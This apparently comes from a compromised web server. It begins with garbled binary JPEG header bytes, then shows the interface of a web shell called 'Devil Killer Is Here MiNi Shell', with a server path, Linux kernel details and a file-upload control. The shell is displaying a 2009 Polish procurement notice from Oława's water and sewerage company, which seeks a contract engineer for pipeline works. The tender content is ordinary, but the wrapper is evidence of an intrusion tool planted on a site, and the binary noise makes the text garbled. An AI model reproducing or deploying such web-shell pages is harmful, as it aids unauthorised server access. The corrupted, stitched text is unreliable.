JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090821/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090821/289326-N-2009.html

<p class="kh_header"><b>Oława: PEŁNIENIE FUNKCJI INŻYNIERA KONTRAKTU przy realizacji:
Budowy sieci wodociągowej i kanalizacji sanitarnej w rejonie ulic Nowy Górnik 
i łącznika drogowego do ulicy Zacisznej w ramach Kontraktu 2, Zadanie 3a.
Budowy sieci kanalizacji sanitarnej od ulicy Radosnej do przepompowni ścieków przy ulicy Kutrowskiego w ramach Kontraktu 1, Zadanie 1a</b><br>
<b>Numer ogłoszenia: 289326 - 2009; data zamieszczenia: 21.08.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Wodociągów i Kanalizacji Spółka z o. o. w Oławie , ul. 3 Maja 30, 55-200 Oława, woj. dolnośląskie, tel. 071 3039521, faks 071 3039533.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zwik.olawa.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> PEŁNIENIE FUNKCJI INŻYNIERA KONTRAKTU przy realizacji:
Budowy sieci wodociągowej i kanalizacji sanitarnej w rejonie ulic Nowy Górnik 
i łącznika drogowego do ulicy Zacisznej w ramach Kontraktu 2, Zadanie 3a.
Budowy sieci kanalizacji sanitarnej od ulicy Radosnej do przepompowni ścieków przy ulicy Kutrowskiego w ramach Kontraktu 1, Zadanie 1a.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest usługa pełnienie funkcji Inżyniera Kontraktu przy realizacji dwóch Kontraktów realizowanych według Warunków Kontraktowych FIDIC - Warunki kontraktowe dla budowy dla robót inżynieryjno - budowlanych Projektowanych przez Zamawiającego (CONDITIONS OF CONTRACT FOR CONSTRUCTION FOR BUILDING AND ENGINEERING WORKS DESIGNED BY THE EMPLOYER) Wydawnictwo: SIDIR; Opis edycji: 4. Wydanie angielsko-polskie 2008 (tłumaczenie pierwszego wydania FIDIC 1999), - Czerwona Książka, w ramach projektu o nazwie Modernizacja oczyszczalni ścieków oraz budowa sieci wodociągowej 
i kanalizacyjnej w mieście Oława tj: 
- 	Kontrakt pn.: Budowa sieci wodociągowej i kanalizacji sanitarnej w rejonie ulic Nowy Górnik i łącznika drogowego do ulicy Zacisznej w ramach Kontraktu 2, Zadanie 3a,
- 	Kontrakt pn.: Budowa sieci kanalizacji sanitarnej od ulicy Radosnej do przepompowni ścieków przy ulicy Kutrowskiego w ramach Kontraktu 1, Zadanie 1a. 
2.	Usługa pełnienia funkcji Inżyniera Kontraktu jest to usługa polegająca na zarządzaniu w/w Kontraktami, obejmująca m.in.: przygotowanie, organizację, nadzór, koordynację 
i zakończenie całego procesu inwestycyjnego związanego z ich realizacją. 
Wykonawca wykonywał będzie obowiązki zgodnie z zawartą umową oraz Warunkami Kontraktowymi FIDIC, wykonywanie obowiązków inspektora nadzoru inwestorskiego i koordynowanie czynności inspektorów nadzoru inwestorskiego zgodnie z przepisami prawa obowiązującego w Polsce, w szczególności ustawy Prawo budowlane (tekst jednolity Dz. U. z 2006 r. Nr 156 poz. 1118 ze zm.), sporządzanie raportów oraz rozliczenia finansowe kontraktów. Przedmiotowe Zarządzanie będzie wykonywane zgodnie z wymaganiami Zamawiającego oraz zgodnie z zasadami realizacji Programu Operacyjnego Infrastruktura i Środowisko. Inżynier będzie w pełni odpowiedzialny za zarządzanie procesem inwestycyjnym objętym Kontraktami.
3.	Zamawiający przewiduje współfinansowanie zamówienia ze środków Unii Europejskiej.
Szczegółowy opis przedmiotu zamówienia przedstawiony został w części III SIWZ.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.54.00.00-5.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1.	Każdy Wykonawca zobowiązany jest zabezpieczyć swą ofertę wadium w wysokości 2 000 PLN
słownie: dwa tysiące PLN
2.	Wadium może być wniesione w następujących formach:
a)	pieniądzu;
b)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że zobowiązanie kasy jest zawsze zobowiązaniem pieniężnym;
c)	gwarancjach bankowych;
d)	gwarancjach ubezpieczeniowych;
e)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158, z późn. zm.).
3.	W przypadku składania przez Wykonawcę wadium w formie gwarancji, musi być ona gwarancją nieodwołalną, bezwarunkową i płatną na pierwsze pisemne żądanie Zamawiającego, sporządzona zgodnie z obowiązującym prawem i winna zawierać następujące elementy:
a)	nazwę dającego zlecenie (Wykonawcy), beneficjenta gwarancji (Zamawiającego), gwaranta (banku lub instytucji ubezpieczeniowej udzielających gwarancji) oraz wskazanie ich siedzib,
b)	określenie wierzytelności, która ma być zabezpieczona gwarancją,
c)	kwotę gwarancji,
d)	termin ważności gwarancji,
e)	zobowiązanie gwaranta do: zapłacenia kwoty gwarancji na pierwsze pisemne żądanie Zamawiającego zawierające oświadczenie, iż Wykonawca, którego ofertę wybrano:
-	odmówił podpisania umowy na warunkach określonych w ofercie, lub
-	zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie Wykonawcy, lub
-	Wykonawca nie złożył dokumentów i/lub oświadczeń i/lub pełnomocnictw, o których mowa w art. 25 ust. 1, Ustawy Pzp, chyba że udowodni, że wynika to z przyczyn niezależących po jego stronie.
4.	Wadium wnoszone w pieniądzu należy wpłacić na następujący rachunek Zamawiającego:
Konto BS w Oławie 67 9585 0007 0010 0006 5445 0001
5.	W przypadku wnoszenia wadium w innej formie niż pieniężnej należy złożyć w ofercie dokument potwierdzający wniesienie wadium w oryginale wraz z oryginałem oferty oraz kserokopię potwierdzona za zgodność z oryginałem wraz z kopią oferty.
6.	W przypadku przelewu wadium na konto Zamawiającego, do oferty oraz kopii oferty należy dołączyć kserokopię przelewu potwierdzoną -za zgodność z oryginałem-.
7.	Za skuteczne wniesienie wadium w pieniądzu Zamawiający uzna wadium, które w oznaczonym terminie, tj. w dniu otwarcia ofert, znajduje się na rachunku Zamawiającego.
8.	Wykonawca zobowiązany jest wnieść wadium przed upływem terminu składania ofert. 
9.	Wykonawca zostanie wykluczony z niniejszego postępowania, jeżeli jego oferta przed upływem terminu składania ofert nie zostanie zabezpieczona wadium w wymaganej wysokości i wybranej formie wymienionej w pkt 10.2.  IDW.
10.	Zamawiający zwróci niezwłocznie wadium według zasad określonych w art. 46 Ustawy Pzp  
11.	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana: 
a)	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie; 
b)	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy;
c)	w sytuacji określonej w art. 46 ust. 4a ustawy Pzp.
12.	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 Ustawy Pzp, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn niezależących po jego stronie.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.	Wykonawca ubiegający się o zamówienie publiczne musi spełniać niżej wymienione warunki udziału w postępowaniu:
1)	posiadać uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień oraz nie podlegać wykluczeniu z postępowania na podstawie art. 24 Ustawy pzp:
Opis sposobu dokonywania oceny spełniania warunku:
- 	Wykonawca spełnia warunek, jeżeli posiada uprawnienia do wykonywania określonej działalności lub czynności i nie podlega wykluczeniu z postępowania na podstawie art. 24 Ustawy pzp;
(w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców ocena w/w warunku dotyczyć będzie każdego wykonawcy odrębnie).
W celu potwierdzenia spełniania niniejszego warunku Wykonawca zobowiązany jest przedłożyć dokumenty wymienione w punkcie 9  IDW.
2)	posiadać niezbędną wiedzę i doświadczenie oraz dysponować potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawić pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia:
Opis sposobu dokonywania oceny spełniania warunku:
a)	Wykonawca spełnia warunek, jeżeli w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał co najmniej:
- 	jedną usługę polegającą na pełnieniu funkcji Inżyniera/Rezydenta na kontrakcie realizowanym według Warunków Kontraktowych FIDIC, lub równoważnym, obejmującym budowę sieci kanalizacji sanitarnej o długości co najmniej 3 km i o wartości robót nie mniejszej niż 5 mln PLN (brutto) oraz wykonanie sieci wodociągowej o długości co najmniej 100 m i o wartości robót min. 100 000 PLN (brutto);
(w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców ocena w/w warunku dotyczyć będzie wszystkich wykonawców łącznie).
	W celu potwierdzenia spełniania niniejszego warunku Wykonawcy zobowiązani są przedłożyć dokumenty wymienione w punkcie 9  IDW.
b)	Wykonawca spełnia warunek, jeżeli dysponuje/będzie dysponował osobami zdolnymi do wykonania niniejszego zamówienia, spełniającymi co najmniej następujące wymagania:
	Inżynier Rezydent posiadający:
-	co najmniej 5 letnie doświadczenie w pełnieniu funkcji Inżyniera/Rezydenta,
- 	pełnienie funkcji Inżyniera/Rezydenta na co najmniej jednej inwestycji obejmującej budowę/rozbudowę sieci kanalizacji sanitarnej o długości co najmniej 3 km 
i o wartości robót min. 5 mln PLN (brutto) i co najmniej jednej inwestycji obejmującej budowę/rozbudowę sieci wodociągowej o długości co najmniej 100 m 
i o wartości robót min. 100 000 PLN (brutto);
Dopuszcza się aby oba rodzaje robót wykonywane były w ramach jednego kontraktu/zadania.
	Inspektor nadzoru w specjalności sanitarnej posiadający:
- 	uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń 
w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych (lub odpowiadające im równoważne upraw?nienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów),
- 	aktualny, na dzień składania ofert, wpis na listę członków właściwej Izby samorządu zawodowego potwierdzony zaświadczeniem właściwej Izby,
- 	doświadczenie w pełnieniu funkcji inspektora nadzoru inwestorskiego w branży sanitarnej na co najmniej 1 kontrakcie/umowie obejmującym wykonanie budowy/rozbudowy sieci kanalizacji sanitarnej o długości co najmniej 3 km 
i o wartości robót min. 5 mln PLN (brutto) oraz na co najmniej 1 kontrakcie/umowie obejmującym wykonanie sieci wodociągowej o długości co najmniej 100 m 
i o wartości robót min. 100 000 PLN (brutto);
Dopuszcza się aby oba rodzaje robót wykonywane były w ramach jednego kontraktu/zadania.
	Inspektor nadzoru w specjalności elektrycznej posiadający:
- 	uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń 
w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych (lub odpowiadające im równoważne upraw?nienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów),
- 	aktualny, na dzień składania ofert, wpis na listę członków właściwej Izby samorządu zawodowego potwierdzony zaświadczeniem właściwej Izby,
- 	co najmniej 5 letnie doświadczenie w pełnieniu funkcji inspektora nadzoru inwestorskiego w branży elektrycznej;
	Inspektor nadzoru w specjalności drogowej posiadający:
- 	uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń w specjalności drogowej (lub odpowiadające im równoważne upraw?nienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów),
- 	aktualny, na dzień składania ofert, wpis na listę członków właściwej Izby samorządu zawodowego potwierdzony zaświadczeniem właściwej Izby,
- 	doświadczenie w pełnieniu funkcji inspektora nadzoru inwestorskiego w branży drogowej na kontrakcie/umowie obejmującym wykonanie budowy/rozbudowy/ przebudowy drogi o długości co najmniej 1 km i o wartości robót min. 0,5 mln PLN (brutto);
	Ekspert ds. zamówień publicznych posiadający:
- 	minimum 4-letnie doświadczenie w przygotowywaniu i przeprowadzaniu przetargów, w tym przygotowanie i przeprowadzenie co najmniej 2 przetargów 
w trybie przetargu nieograniczonego na wyłonienie Wykonawcy robót budowlanych polegających na budowie/rozbudowie sieci kanalizacji sanitarnej i/lub sieci wodociągowej realizowanej według Warunków Kontraktowych FIDIC 
lub równoważne o wartości robót budowlanych minimum 2 mln PLN (brutto) każda;
	Ekspert ds. rozliczeń finansowych i raportowania posiadający:
- 	minimum 4-letnie doświadczenie  w rozliczaniu kontraktów/umów realizowanych według Warunków Kontraktowych FIDIC lub równoważnych , 
- 	doświadczenie w prowadzeniu obmiarów, analizy kosztów budowy oraz sporządzania raportów, na co najmniej jednym kontrakcie rozliczanym obmiarowo 
o wartości robót budowlanych minimum 6 mln PLN (brutto);
(w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch 
lub więcej Wykonawców ocena w/w warunku dotyczyć będzie wszystkich wykonawców łącznie).
W celu potwierdzenia spełniania niniejszego warunku Wykonawcy zobowiązani są przedłożyć dokumenty wymienione w punkcie 9  IDW.
3)	znajdować się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
Opis sposobu dokonywania oceny spełniania warunku:
Wykonawca spełnia warunek jeżeli:
a)	posiada środki finansowe w wysokości co najmniej 40 tys. PLN lub zdolność kredytową w wysokości co najmniej 40 tys.  PLN.
(w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców ocena w/w warunku dotyczyć będzie wszystkich wykonawców łącznie).
W celu potwierdzenia spełniania niniejszego warunku Wykonawca zobowiązany jest przedłożyć dokumenty wymienione w punkcie 9 IDW.
b)	jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę minimum 2 mln PLN
(w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch 
lub więcej Wykonawców ocena w/w warunku dotyczyć będzie wszystkich wykonawców łącznie).
W celu potwierdzenia spełniania niniejszego warunku Wykonawca zobowiązany jest przedłożyć dokumenty wymienione w punkcie 9  IDW.
2.	Ocena spełniania w/w warunków udziału w postępowaniu dokonana zostanie według reguły spełnia/nie spełnia, na podstawie złożonych dokumentów, określonych w punkcie 9 IDW..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.	Wykonawca w celu potwierdzenia spełniania warunków udziału w postępowaniu, opisanych 
w punkcie 8 IDW powinien złożyć n/w dokumenty i oświadczenia;
1)	oświadczenie o spełnianiu warunków udziału w postępowaniu oraz o nie podleganiu wykluczeniu na podstawie art. 24 Ustawy pzp, sporządzone według Załącznika nr 2 do IDW  (w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców w/w dokument musi być podpisany przez Pełnomocnika składającego ofertę wspólną w zakresie określonym w art. 22 ust. 1 pkt 1-3 oraz przez wszystkich Wykonawców składających ofertę wspólną w zakresie określonym w art. 22 ust. 1 pkt 4 
Ustawy pzp);
2)	aktualny odpis z właściwego rejestru albo aktualne zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert (w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców w ofercie muszą być złożone przedmiotowe dokumenty dla każdego z nich);
3)	aktualne zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu, wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert (w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców w ofercie muszą być złożone przedmiotowe dokumenty dla każdego z nich);
4)	wykaz wykonanych usług w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że usługi te zostały wykonane należycie, sporządzone według załącznika nr 3 do  IDW (w przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, wykaz składa wykonawca spełniający ten warunek udziału w postępowaniu);
5)	wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami 
na temat ich kwalifikacji zawodowych i doświadczenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności, sporządzone według załącznika nr 4 do  IDW wraz z dokumentami potwierdzającymi, że osoby te posiadają wymagane uprawnienia (w przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, wykaz składa wykonawca spełniający ten warunek udziału w postępowaniu);
6)	pisemne zobowiązania innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie, o którym mowa w ppkt. 5), Wykonawca wskaże osoby, którymi będzie dysponował;
7)	informację banku lub spółdzielczej kasy oszczędnościowo - kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy, wystawiona nie wcześniej niż 3 miesiące przed upływem terminu składania ofert (w przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, wykaz składa Wykonawca spełniający ten warunek udziału w postępowaniu);
8)	polisa, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca posiada wymagane ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności
	(w przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, wykaz składa wykonawca spełniający ten warunek udziału 
w postępowaniu).

UWAGA:
-	Zamawiający dołączył do  IDW w/w wzory załączników, które są materiałem uzupełniającym, a ich forma nie może być traktowana przez Wykonawców, jako obowiązująca. 
-	Za treść oferty oraz jej kompletność odpowiada Wykonawca.
-	Jeżeli Wykonawca przedstawi dokumenty, w których wartość podana będzie w innej walucie niż PLN, to dla potwierdzenia spełnienia warunku Zamawiający dokona przeliczenia tej waluty na PLN wg średniego bieżącego kursu wyliczonego i ogłoszonego przez Narodowy Bank Polski z dnia opublikowania ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych.
	Kursy walut dostępne są pod następującym adresem internetowym:
http://www.nbp.pl/home.aspx?f=/Kursy/kursy.htm

2.	Stosownie do treści § 2 Rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 r. (Dz. U. Nr 87, poz. 605) w sprawie rodzaju dokumentów, jakich może żądać Zamawiający od Wykonawcy oraz form, w jakich te dokumenty mogą być składane, jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej:
1)	zamiast dokumentów, o których mowa powyżej w pkt. 9.1.2) i 9.1.3)  IDW, składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że: 
a)	nie otwarto jego likwidacji ani nie ogłoszono upadłości; 
b)	nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu;
2)	jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa powyżej w pkt. 9.2.1) i 2) IDW zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania. 
2.	Dokumenty, o których mowa w pkt 9.2.a)  IDW, winny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. Dokumenty, o których mowa w pkt 9.2.b)  IDW winny być wystawione nie wcześniej niż 3 miesiące przed terminem składania ofert.
3.	Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt 9.2.  IDW zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania. Zapisy punktu 9.3.  IDW stosuje się odpowiednio. 
4.	Dokumenty są składane w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę.
5.	Zamawiający może żądać przedstawienia oryginału lub notarialnie poświadczonej kopii dokumentu, gdy złożona przez wykonawcę kopia dokumentu jest nieczytelna lub budzi wątpliwości, co do jej prawdziwości.
6.	Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski, poświadczonym przez wykonawcę.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.zwik.olawa.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Wodociągów i Kanalizacji Spółka z ograniczoną odpowiedzialnością w Oławie,
55-200 Oława, ul. 3 Maja 30, pok. 8.</p>
